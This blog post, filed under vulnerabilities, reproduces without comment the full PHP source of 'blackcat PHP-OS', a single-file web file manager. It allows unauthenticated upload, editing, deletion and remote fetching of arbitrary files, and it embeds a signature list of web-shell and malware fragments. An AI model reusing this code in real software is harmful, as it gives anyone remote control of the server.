Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

blackcat PHP-OS

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 92
<html>
<head>
<style>
body {
<html>
<head>
<style>
body {
cursor: crosshair;
min-height: 100vh;
}

nav {
position: absolute;
top: 15px;
left: 50%;
transform: translateX(-50%);
display: inline-block;
border: 2px solid #EBECF1;
border-radius: 30px;
animation: slide-in 1s ease-out;
}

ul {
position: relative;
display: flex;
flex: 1 1 auto;
margin: 0;
padding: 0 30px;
list-style-type: none;
li:not(:last-child) {
margin-right: 40px;
}
li {
border: 2px solid transparent;
border-radius: 5px;
padding: 10px;
transition: background 0.2s;
a {
color: #2375D8;
text-decoration: none;
text-transform: uppercase;
transition: color 0.2s;
}
ul {
visibility: hidden;
opacity: 0;
position: absolute;
display: block;
margin: 12px -12px;
padding: 0;
background: #FFA91B;
border: 2px solid #F7C833;
border-right: 2px solid #F89329;
border-bottom: 2px solid #F89329;
border-radius: 5px;
transition: opacity 0.2s, visibility 0.2s;
li {
margin: -2px 0 0 -2px;
width: calc(100% - 20px);
line-height: 1.7;
a {
color: #2375D8;
}
}
}
&:hover {
background: #EC4138;
border: 2px solid #F05749;
border-right: 2px solid #E02A21;
border-bottom: 2px solid #E02A21;
a {
color: #F9F8FD;
}
ul {
visibility: visible;
opacity: 1;
box-shadow: 0px 3px 5px 2px #EBECF1;
li {
a {
color: #F9F8FD;
}
}
}
}
}
}

@keyframes slide-in {
0% {
top: -50px;
}
40% {
top: 20px;
}
70% {
top: 10px;
}
100% {
top: 15px;
}
}
</style>
</head>
<body>
<script>
function sleep(ms) {
return new Promise(resolve => setTimeout(resolve, ms));
}

var str = 'blackcat';
document.title = '';
async function typewriteTitle() {
for (let i = 0; i < str.length; i++) {
document.title += str.charAt(i);
console.log(document.title); //debug only
await sleep(200);
}
}
typewriteTitle();
</script>
<body link="#808080">
<body bgcolor="#ADD8E6">
<center>
<pre>


______ _ _
| _ \ | | | |
| | | |___ ___| | _| |_ ___ _ __
| | | / _ \/ __| |/ / __/ _ \| '_ \
| |/ / __/\__ \ <| || (_) | |_) |
|___/ \___||___/_|\_\\__\___/| .__/
| |
|_|
##########
# PHP-OS #
##########
</pre>
<font color="white">Multitasking system</font><br>
<?
/*
#############################################################################
# Name software: blackcat PHP-OS #
# Version: alpha #
# Author: Emiliano Febbi #
# E-mail: emilianofebbi.1994 -at- gmail -dot- com #
# My site: https://nullsite.altervista.org/ #
# Code and release by Emiliano Febbi #
#############################################################################
# Manual: #
# 1- The File name must be "blackcat.php" obligatory #
# 2- The prompt commands are: #
# "unistall" for unistall automatically blackcat #
# "rename" for to rename files #
# "wget https://www.site.come/file.jpg" for get external files #
#############################################################################
# Description: #
# The software in question is an operating system written in php and a few #
# lines of javascript that relies on a vulgar prefix for the management of #
# its files and folders which makes it closed circuit. #
# What makes it innovative is the fact that it is a multitasking system #
# and that it is a single file and does not require anything else. #
# blackcat is compatible with all file formats or extensions and with all #
# webservers that support php and javascript. #
# Although it is a very basic system, Blackcat has: #
# - a prompt to launch commands #
# - a simple calculator #
# - ability to navigate on the main social networks and Google #
# as a search engine #
# - possibility to search for files with a specific form #
# - advanced file management #
# - integrated security system ( blackcat Defender ) #
# #
#In addition to being simple to use, it is also simple to modify to possibly#
# expand its functions in the future. #
#############################################################################
For any bugs to report, my e-mail is present above!
*/
/*#System calculator#*/
if (isset($_GET['calculator'])) {
$buttons = [1,2,3,'+',4,5,6,'-',7,8,9,'*','C',0,'.','/','='];
$pressed = '';
if (isset($_POST['pressed']) && in_array($_POST['pressed'], $buttons)) {
$pressed = $_POST['pressed'];
}
$stored = '';
if (isset($_POST['stored']) && preg_match('~^(?:[\d.]+[*/+-]?)+$~', $_POST['stored'], $out)) {
$stored = $out[0];
}
$display = $stored . $pressed;

if ($pressed == 'C') {
$display = '';
} elseif ($pressed == '=' && preg_match('~^\d*\.?\d+(?:[*/+-]\d*\.?\d+)*$~', $stored)) {
$display .= eval("return $stored;");
}
echo "Calculator<br>";
echo "<form action=\"\" method=\"POST\">";
echo "<table style=\"width:300px;border:solid blue;\">";
echo "<tr>";
echo "<td colspan=\"4\">$display</td>";
echo "</tr>";
foreach (array_chunk($buttons, 4) as $chunk) {
echo "<tr>";
foreach ($chunk as $button) {
echo "<td",(count($chunk) != 4 ? " colspan=\"4\"" : "") , "><button name=\"pressed\" value=\"$button\" style=\"background-color:#6495ED\">$button</button></td>";
}
echo "</tr>";
}
echo "</table>";
echo "<input type=\"hidden\" name=\"stored\" value=\"$display\">";
echo "</form>";
};;;;;
?>
<?
if (isset($_GET['prompt'])) {
?>
prompt<br>
<form action='<?php echo $_SERVER['PHP_SELF']; ?>' method='POST'>
<font color="white">
<textarea name="command" rows="10" cols="50" style="background-color: black;color:#fff;">~blackcat>> command</textarea><br>
</font>
<input type="submit" value="Enter" style="background-color:#6495ED">
</form>
<?
}
/*#System blackcat prompt*/

/*#rename command*/
if($_POST['command'] == "~blackcat>> rename") {
$ren = $_POST['command'];
$rename = '~blackcat>> rename';
if (strpos($ren, $rename) != true) {
?>
<form action='<?php echo $_SERVER['PHP_SELF']; ?>' method='POST'>
<input type="text" name="oldname" style="background-color: black;color:#fff;" value="oldname.format">
<input type="text" name="newname" style="background-color: black;color:#fff;" value="newname.format">
<input type="submit" value="Enter" style="background-color:#6495ED">
</form>
<?
};;;
};;;;
if($_POST['oldname'] and $_POST['newname']) {
$olddname = $_POST['oldname'];
$newwname = $_POST['newname'];
rename($olddname , $newwname);
echo '<script>alert("renamed file!")</script>';
};;
/*#unistall command*/
if($_POST['command'] == "~blackcat>> unistall") {
$unistall_me = $_SERVER['PHP_SELF'];
unlink(basename($unistall_me));
echo '<script>alert("blackcat successfully uninstalled!")</script>';
};;;

/*#wget command*/
if(strpos($_POST['command'] , '~blackcat>> wget') !== false) {
$uno = "~blackcat>> wget ";
$wget = $_POST['command'];
$due = "";
$url = str_replace($uno,$due,$wget);

$fileee = file_get_contents($url);
$nameeee = basename($url);
$exttt = pathinfo($url, PATHINFO_EXTENSION);
$namee2 =pathinfo($url, PATHINFO_FILENAME);

$processing = "wget.txt";
$fp = fopen($processing,"w");
fputs ($fp,"$url");
fclose($fp);
$line = file($processing)[0];
$grabbing = file_get_contents("$line");
$fp = fopen("$namee2.$exttt","w");
fputs ($fp,"$grabbing");
fclose($fp);
unlink("wget.txt");
};
/*#end blackcat prompt*/
?>
<nav>
<ul>
<li><a href="?prompt=blackcat.php">prompt</a></li>
<li><a href="?calculator=blackcat.php">calculator</a></li>
<li>
<a href="#0">social networks</a>
<ul>
<li><a href="javascript:productPop('https://www.youtube.com/','8 mil');">youtube</a></li>
<li><a href="javascript:productPop('https://www.facebook.com/','8 mil');">facebook</a></li>
<li><a href="javascript:productPop('https://www.instagram.com/','8 mil');">instagram</a></li>
<li><a href="javascript:productPop('https://www.tiktok.com/','8 mil');">tiktok</a></li>
</ul>
</li>
<li>
<a href="#0">search engine</a>
<ul>
<li><a href="javascript:productPop('https://www.google.com/','8 mil');">google</a></li>
</ul>
</li>
<li><a href="?about=blackcat.php">About Blackcat</a></li>
</ul>
</nav>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>">
<button type="submit" style='background-color:#6495ED'>
refresh
</button>
</form>
</center><div align="right">~search for files<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
<input type="text" name="file_kyw" align="right">
<input type="submit" value="search" style="background-color:#6495ED"/>
</form>
</div>
<center>
<?
/*#File finder*/
if ($_POST['file_kyw']) {
if ($handle = opendir('./')) {
$keyword = $_POST['file_kyw'];
while (false !== ($entry = readdir($handle))) {
if (preg_match('/'.$keyword.'/i', $entry)) {
?>
<div align="right">
Found: <a href="javascript:productPop('<?php echo "$entry"; ?>','8 mil');"><?php echo "$entry <br>"; ?></a>
</div>
<?

}
}

closedir($handle);
}
};;;;
?>
~Files
<?php
/*#begin core system*/
$IP = $_SERVER['REMOTE_ADDR'];
$extensions = array(
"php",
"html",
"css",
"htm",
"asp",
"aspx",
"js",
"jpg",
"jpeg",
"png",
"bmp",
"gif",
"exe",
"bat",
"dll",
"iso",
"pl",
"au3",
"rb",
"rbw",
"sh",
"apk",
);
foreach ($extensions as $ext) {
foreach (glob("./*.$ext") as $filename) {
$prefix = 'SYS_';
if (strpos($filename, $prefix) != false) {
?>
<script>
var newwindow;
function productPop(url)
{
newwindow=window.open(url,name,'width=560,height=340,toolbar=0,menubar=0,location=0');
if (window.focus) {newwindow.focus()}
}
</script>
<div style="background:#ADD8E6;
border:1px solid blue;">
<table>
<div style="width:100%;max-width:300px;border-radius:10px;border:1px red solid;overflow:hidden">
<div style="background-color:#eeeeee;padding:5px">
<a href="javascript:productPop('<?php echo "$filename"; ?>','8 mil');"><?php echo "$filename"; ?></a><br>
<?
echo "<i><font color='red'>&diam;</font> $filename {<b>size</b> " . filesize($filename) . "\n";
echo "}</i><br>";
}
}
};

?>
</div>
</div>
</table>
</div>

<br>
~Folders<br>
<div style="background:#ADD8E6;
border:1px solid blue;">
<table>
<div style="width:100%;max-width:300px;border-radius:10px;border:1px red solid;overflow:hidden">
<div style="background-color:#eeeeee;padding:5px">
<?
/*#all folders*/
$Mydirr = './';
foreach(glob($Mydirr.'*', GLOB_ONLYDIR) as $dirr) {
$prefixx = 'SYS_';
if (strpos($dirr, $prefixx) != false) {
echo "<font color='red'>$dirr</font> , ";
}

}
/*all folders and files*/
$Mydir = './';
foreach(glob($Mydir.'*', GLOB_ONLYDIR) as $directory) {
$prefix = 'SYS_';
if (strpos($directory, $prefix) != false) {




if(is_dir($directory))
{
if($handle=opendir($directory))
{

while (($indice = readdir($handle)) !== false) {

if($indice!='.' && $indice!='..')
{
echo "<font color='red'><br>------------------------------------------------------</font>";
echo "<font color='red'>Folder -></font> $directory <br>";

?>
<a href="javascript:productPop('<?php echo "$directory/$indice"; ?>','8 mil');"><?php echo "<i> $directory/$indice </i>"; ?></a><br>
<?
echo "<font color='red'>------------------------------------------------------</font>";
}
}
}

closedir($handle);
}

};;
};;;
?>
</div>
</div>
</table>
</div>
<br>
<div style="background:#ADD8E6;
border:1px solid blue;">
<body link="#808080">
<?


// ini_set('display_errors', 1);
ini_set('display_errors', 0);
// error_reporting(E_ALL);
error_reporting(0);

$currentDir = __DIR__;

//if new path set
if(isset($_POST['current-dir'])){
$currentDir = $_POST['current-dir'];
}

//seperator for creating url
$seprator = DIRECTORY_SEPARATOR;

//function to create back url
function backurl($url, $seprator){
return substr($url, 0, strrpos($url, $seprator));
}

//function for scaning directory
function scan($path){
echo $path;
global $seprator;

//back btn
echo "<br><hr><br><form style='display:inline-block;' action='".basename($_SERVER['PHP_SELF'])."?blackcat=shell&do=listdir' method='post'>
<input type='hidden' value='".backurl($path, $seprator)."' name='current-dir'>
<input style='margin-right: 20px; background-color:#6495ED' type='submit' value='<- Back' name='list-dir'>
</form>";
//create file btn
echo "<form style='display:inline-block;' action='".basename($_SERVER['PHP_SELF'])."?blackcat=shell&do=listdir' method='post'>
<input type='hidden' value='".$path."' name='current-dir'>
<input type='text' name='name'>
<input style='margin-right: 20px;margin-left: -5px; background-color:#6495ED' type='submit' value='New file' name='create-file'>
</form>";
//create folder btn
echo "<form style='display:inline-block;' action='".basename($_SERVER['PHP_SELF'])."?blackcat=shell&do=listdir' method='post'>
<input type='hidden' value='".$path."' name='current-dir'>
<input type='text' name='name'>
<input style='margin-right: 20px;margin-left: -5px; background-color:#6495ED' type='submit' value='New folder' name='create-dir'>
</form>";
//upload folder btn
echo "<form style='display:inline-block;' action='".basename($_SERVER['PHP_SELF'])."?blackcat=shell&do=listdir' method='post' enctype='multipart/form-data'>
<input type='hidden' value='".$path."' name='current-dir'>
<input type='file' name='file'>
<input style='margin-right: 20px;margin-left: -5px; background-color:#6495ED' type='submit' value='Install file' name='upload-file'>
</form>";
//scan directory
$dir = scandir($path);
$files = array_diff($dir, array('.', '..'));
foreach ($files as $value) {

$isDir = $path."/".$value;
$astyle = "text-decoration:none;";

//action form for file and folder

//edit file
$actionform = "<form style='display:inline-block;' action='".basename($_SERVER['PHP_SELF'])."?blackcat=shell&do=listdir' method='post'>
<input type='hidden' value='".$path."' name='current-dir'>
<input type='hidden' value='".$path.$seprator.$value."' name='edit-file-path'>
<input style='margin-left: 20px; background-color:#6495ED' type='submit' value='edit' name='editfile'>
</form>";

//delete file
$actionform .= "<form style='display:inline-block;' action='".basename($_SERVER['PHP_SELF'])."?blackcat=shell&do=listdir' method='post'>
<input type='hidden' value='".$path."' name='current-dir'>
<input type='hidden' value='".$path.$seprator.$value."' name='del-file-path'>
<input style='margin-left: 20px; background-color:#6495ED' type='submit' value='delete' name='del-file'>
</form>";

if(is_dir($isDir)){
//style for directory
$astyle = "color:#FF0000;text-decoration:none;";
//open directory
$actionform = "<form style='display:inline-block;' action='".basename($_SERVER['PHP_SELF'])."?blackcat=shell&do=listdir' method='post'>
<input type='hidden' value='".$path.$seprator.$value."' name='current-dir'>
<input style='margin-left: 20px; background-color:#6495ED' type='submit' value='Open' name='list-dir'>
</form>";
//delete directory
$actionform .= "<form style='display:inline-block;' action='".basename($_SERVER['PHP_SELF'])."?blackcat=shell&do=listdir' method='post'>
<input type='hidden' value='".$path."' name='current-dir'>
<input type='hidden' value='".$path.$seprator.$value."' name='del-dir-path'>
<input style='margin-left: 20px; background-color:#6495ED' type='submit' value='Delete' name='del-dir'>
</form>";
}
echo "<li><a href='javascript: void(0);' style='$astyle'>$value $actionform</a></li>";
}
echo "</ul>";
}
?>
<body>
<pre>

_ _ _
| | | | (_)
___ ___| |_| |_ _ _ __ __ _ ___
/ __|/ _ \ __| __| | '_ \ / _` / __|
\__ \ __/ |_| |_| | | | | (_| \__ \
|___/\___|\__|\__|_|_| |_|\__, |___/
__/ |
|___/

</pre>


<li><a href="<?php echo basename($_SERVER['PHP_SELF']); ?>?blackcat=shell&do=listdir""><font color='#808080'>installing / deleting / modifying files</font></a></li>
<li><a href="<?php echo basename($_SERVER['PHP_SELF']); ?>?defender=blackcat.php""><font color='#808080'>blackcat defender scan {Anti-Malware}</font></a></li>
<?
if (isset($_GET['defender'])) {
?>
<br>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>">
<button type="submit" style='background-color:#6495ED'>
<- Desktop
</button>
</form>
<?
/*#blackcat Anti-Malware*/
echo "<div style='width:100%;max-width:300px;border-radius:10px;border:1px red solid;overflow:hidden'>
<div style='background-color:#eeeeee;padding:5px'>";
print "Blackcat Defender found these suspicious files:{list}<br>";
echo "</div></div>";
$search_mlw = array(
"c99shexit();",
"_POST['phpev'].",
"%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64",
"Vegp7mSyWmSMZmW0WMKnmMc",
"ob_start();",
"_POST['liste1']);",
"OOO000000{4}.",
"wKTs='));return;",
"0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTz",
"GLOBALS['OOO0000O0']('JElJSUl",
"0nc2hlbGxfZX",
"This email address is being protected from spambots. You need JavaScript enabled to view it.",
"passthru",
"/etc/passwd",
"level=0",
"filemanager&act3=del&dir",
"j=ord('C')",
"work_dir = exec('pwd')",
"eval(gzinflate(base64_decode('HJ3Hk",
"dos=",
"+Avu/JcredL7v7x6ks7HU3pb0TrXKQyEkJ4Y/TI20kouKTKc//",
"ara = posix_getpwuid(",
"\x00/../../../../../../../../../../../../",
"erro_retorno)) echo",
"escaped = array_map",
"%H:%M %b %e %Y",
"5WmSOZ+JDXEBtQvyn]@cCvWx~aF\}",
"wser, 43)",
"_POST[liz0])",
"row[Column_name] ==",
"sSHcY: echo",
"time()+(1*24*3600))",
"function GD6A_()",
"goto NjtG4; gc9kA: if ",
"PmfAp) { goto n_96v",
"eP56D: s53xt: goto vGygH",
"aeyv_) .",
"XqZy6 = substr",
"ik04L)); goto RdzWe; Z237s: if (!isset(",
"OO00O0000=0x26548",
"sleep(1); goto CL39n; GsH3h: system",
"g+vLLaGErGwhkJ4QEghbIAkJcE4/rmM7sYk3bGc9r//702ix5cRhOT1t770",
"filename2,'rb');",
"('JElJSUlJSUlJbEkx",
"4w8khSI7DWIciS82gW0fU6PUTsmWCsP/ys",
"TksP/y4mcIpegmb2ApElsQV2kQV2kQV2KAXeK0oVCKV2kQV2kQV2kQrEAy4VKn9B",
"OO00O0000=0xba70;eval",
"q_qzC = explode(",
"compress.zlib://",
"eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd",
"& 00400) ? 'r' : '-';",
"file_w=@fopen(urldecode(",
"function eh(",
"nlines=htmlspecialchars",
"error_reporting(E_ALL ^ E_NOTICE);",
".substr(sprintf('%o', fileperms(",
"passwd=fopen('/etc/passwd','r');",
"sql();break;",
"gkTzAwME8wTzAwLDB4NTRiKTskT08wME8wME8wPSRPT08wMDAwT",
"d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+",
"['OOO0000O0']('JElJSUlJSUlJSWxsMT0na",
"_POST['eval']))",
"jLsH_FwcTTMcPkfBt",
"cikti=trim",
"goto N1clF; mk1vZ: eval(base64_decode",
"if( ini_get('safe_mode') ) {",
"} elseif(@function_exists('ocilogon')) {",
"PYjDn",
"rBRJT: pclose",
"fUNXB < count(",
"fhM8v); goto DdFnP; KPJmF: if",
"kNJz4++; goto ZNPex; bSmVB: if (!",
"bPSwh = ",
"ts9lh; goto zK_2G; mk0QS: echo",
"!CbBb , !CbBdqfcjj9 { { 9&((:'));",
"+1])-ord('A'))*16+(ord(",
"Ei0c87P6EfkSNAxrpG09vy",
"+JDXEBtLbx09vy",
"upGfmCD4wmgxs8UywCD4Qvy49B",
"kX8cJsli5SPSCWmalrLa+",
"7x6qseZqH+7",
"vSvUSW0fTXIHkSM3MXqQKHoQ",
"CWmaC2+7lsP7lWeQTX8sTX87",
")));@eval",
"w2Kcw9CT0Xqc5WeJ5o+gd9",
"'676574637764'"
);



foreach($search_mlw as $search_mlww) {
$dir223 = './';
$files223 = scandir($dir223,1);
foreach ($files223 as $lines223){
if(strlen($lines223) > 3 && strpos($lines223, '.php') !== false){
$readfile223 = fopen('./'.$lines223, 'r');

while(!feof($readfile223)) {
$contents223 = fgets($readfile223);
if(strpos($contents223, $search_mlww) !== false)

echo str_replace("blackcat.php","","<center><font color='red'> $lines223 </font></center>");


}
fclose($readfile223);

}
}
};;;
}
?>
<?
//to do some action
if(isset($_GET['do'])){

$do = $_GET['do'];
switch ($do) {

//list file and folder
case 'listdir':

//create file in current directory
if(isset($_POST['create-file'])){
$dirpath = $_POST['current-dir'];
$name = $_POST['name'];
$cfile = $dirpath.$seprator."SYS_$name";
$myfile = fopen($cfile, "w") or die("Unable to open file!");
fclose($myfile);

}

//create folder in current directory
if(isset($_POST['create-dir'])){
$dirpath = $_POST['current-dir'];
$name = $_POST['name'];
rename("$name", "SYS_$name");
$cfolder = $dirpath.$seprator."SYS_$name";
mkdir($cfolder, 0777, true);

}

//upload file in current directory
if(isset($_POST['upload-file'])){
$dirpath = $_POST['current-dir'];
$file_tmp =$_FILES['file']['tmp_name'];
$file_name = $_FILES['file']['name'];
move_uploaded_file($file_tmp, $file_name);
/*#blackcat Anti-Malware*/
$badsx = array(
"c99shexit();",
"_POST['phpev'].",
"%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64",
"Vegp7mSyWmSMZmW0WMKnmMc",
"ob_start();",
"_POST['liste1']);",
"OOO000000{4}.",
"wKTs='));return;",
"0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTz",
"GLOBALS['OOO0000O0']('JElJSUl",
"0nc2hlbGxfZX",
"This email address is being protected from spambots. You need JavaScript enabled to view it.",
"passthru",
"/etc/passwd",
"level=0",
"filemanager&act3=del&dir",
"j=ord('C')",
"work_dir = exec('pwd')",
"eval(gzinflate(base64_decode('HJ3Hk",
"dos=",
"+Avu/JcredL7v7x6ks7HU3pb0TrXKQyEkJ4Y/TI20kouKTKc//",
"ara = posix_getpwuid(",
"\x00/../../../../../../../../../../../../",
"erro_retorno)) echo",
"escaped = array_map",
"%H:%M %b %e %Y",
"5WmSOZ+JDXEBtQvyn]@cCvWx~aF\}",
"wser, 43)",
"_POST[liz0])",
"row[Column_name] ==",
"sSHcY: echo",
"time()+(1*24*3600))",
"function GD6A_()",
"goto NjtG4; gc9kA: if ",
"PmfAp) { goto n_96v",
"eP56D: s53xt: goto vGygH",
"aeyv_) .",
"XqZy6 = substr",
"ik04L)); goto RdzWe; Z237s: if (!isset(",
"OO00O0000=0x26548",
"sleep(1); goto CL39n; GsH3h: system",
"filename2,'rb');",
"('JElJSUlJSUlJbEkx",
"4w8khSI7DWIciS82gW0fU6PUTsmWCsP/ys",
"TksP/y4mcIpegmb2ApElsQV2kQV2kQV2KAXeK0oVCKV2kQV2kQV2kQrEAy4VKn9B",
"OO00O0000=0xba70;eval",
"q_qzC = explode(",
"compress.zlib://",
"eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd",
"& 00400) ? 'r' : '-';",
"file_w=@fopen(urldecode(",
"function eh(",
"nlines=htmlspecialchars",
"error_reporting(E_ALL ^ E_NOTICE);",
".substr(sprintf('%o', fileperms(",
"passwd=fopen('/etc/passwd','r');",
"sql();break;",
"gkTzAwME8wTzAwLDB4NTRiKTskT08wME8wME8wPSRPT08wMDAwT",
"d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+",
"['OOO0000O0']('JElJSUlJSUlJSWxsMT0na",
"_POST['eval']))",
"jLsH_FwcTTMcPkfBt",
"cikti=trim",
"goto N1clF; mk1vZ: eval(base64_decode",
"if( ini_get('safe_mode') ) {",
"} elseif(@function_exists('ocilogon')) {",
"PYjDn",
"rBRJT: pclose",
"fUNXB < count(",
"fhM8v); goto DdFnP; KPJmF: if",
"kNJz4++; goto ZNPex; bSmVB: if (!",
"bPSwh = ",
"ts9lh; goto zK_2G; mk0QS: echo",
"!CbBb , !CbBdqfcjj9 { { 9&((:'));",
"+1])-ord('A'))*16+(ord(",
"Ei0c87P6EfkSNAxrpG09vy",
"+JDXEBtLbx09vy",
"upGfmCD4wmgxs8UywCD4Qvy49B",
"kX8cJsli5SPSCWmalrLa+",
"7x6qseZqH+7",
"vSvUSW0fTXIHkSM3MXqQKHoQ",
"CWmaC2+7lsP7lWeQTX8sTX87",
")));@eval",
"w2Kcw9CT0Xqc5WeJ5o+gd9",
"'676574637764'"
);



foreach($badsx as $badssx) {

$filexz = file_get_contents($file_name);
if(strpos($filexz, $badssx))
{
unlink("$file_name");
echo '<script>alert("Blackcat Defender: File Blocked {Virus Found}")</script>';
die();
}
};


rename(__DIR__.$seprator.$file_name,$dirpath.$seprator."SYS_$file_name");

}

//delete dir
if(isset($_POST['del-dir'])){

$deldirpath = $_POST['del-dir-path'];
if(!rmdir($deldirpath)){
echo "<span style='color:red;' >warning: ".$deldirpath." folder is not empty.</span><br><br>";
}
}

//delete file
if(isset($_POST['del-file'])){

$deldirpath = $_POST['del-file-path'];
unlink($deldirpath);
}

//edit file
if(isset($_POST['editfile'])){

$editfilepath = $_POST['edit-file-path'];
echo "<hr>Editing $editfilepath<br><br>";
if(isset($_POST['change-file-code'])){
$code = $_POST['code'];
$myfile = fopen($editfilepath, "w") or die("Unable to open file!");
fwrite($myfile, $code);
fclose($myfile);
echo '<meta http-equiv="refresh" content="0; url=blackcat.php?blackcat=shell&do=listdir">';
echo '<script>alert("saved file!")</script>';
}
?>
<!-- form for editor -->
<form action="<?php basename($_SERVER['PHP_SELF']) ?>"?blackcat=shell&do=listdir" method="post" style="text-align: center;">
<textarea name="code" id="editor" cols="30" rows="10" style="width: 90%; height: 70vh;"><?php echo htmlentities(file_get_contents($editfilepath)); ?></textarea>
<br>
<input type='hidden' value='' name='editfile'>
<input type='hidden' value='<?php echo $editfilepath; ?>' name='edit-file-path'>


<input type='hidden' value='<?php echo $currentDir; ?>' name='current-dir'>
<input type="submit" style='background-color:#6495ED' value="save" name="change-file-code">
</form><br><hr><br>

<?

}

//list dir
scan($currentDir);
echo '<form action="'.$SERVER[PHP_SELF].'">
<button type="submit" style="background-color:#6495ED">
<- Desktop
</button>
</form>';

break;
?>

<?



}
}
?>
<?
if (isset($_GET['about'])) {
echo '<script>alert("blackcat PHP-OS \nVersion: alpha \nAuthor: Emiliano Febbi \nMy site: https://nullsite.altervista.org/\nCode and release by Emiliano Febbi\n############\n# info: #\n############\nClosed-loop operating system\n")</script>';
};
?>
</div>
<p align="right">
<font color="white">
<? echo date("F j, Y, g:i a", time());
echo "<br>welcome $IP";
/*#end core system*/
?>
</font>
</p>
</center>
</body>
</html>
Social Media Share